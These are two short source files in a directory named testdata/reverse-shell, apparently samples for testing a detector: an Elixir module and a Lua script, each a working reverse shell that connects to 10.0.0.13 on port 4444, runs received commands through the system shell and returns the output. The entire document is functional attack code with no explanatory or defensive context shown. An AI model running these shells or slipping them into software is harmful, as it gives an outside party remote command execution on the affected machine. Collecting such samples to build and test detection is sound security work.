File: testdata/reverse-shell/revshell.ex
# Elixir reverse shell
defmodule Revshell do
  def run do
    {:ok, sock} = :gen_tcp.connect(~c"10.0.0.13", 4444, [:binary, active: false])
    loop(sock)
  end

  defp loop(sock) do
    case :gen_tcp.recv(sock, 0) do
      {:ok, data} ->
        cmd = String.trim(data)
        {out, _} = System.cmd("/bin/sh", ["-c", cmd], stderr_to_stdout: true)
        :gen_tcp.send(sock, out)
        loop(sock)
      _ ->
        :gen_tcp.close(sock)
    end
  end
end

Revshell.run()

File: testdata/reverse-shell/revshell.lua
-- Lua reverse shell
local socket = require("socket")
local s = socket.tcp()
s:connect("10.0.0.13", 4444)
while true do
    local cmd, status = s:receive()
    if status == "closed" then break end
    local f = io.popen(cmd, 'r')
    local out = f:read("*a")
    f:close()
    s:send(out)
end
s:close()
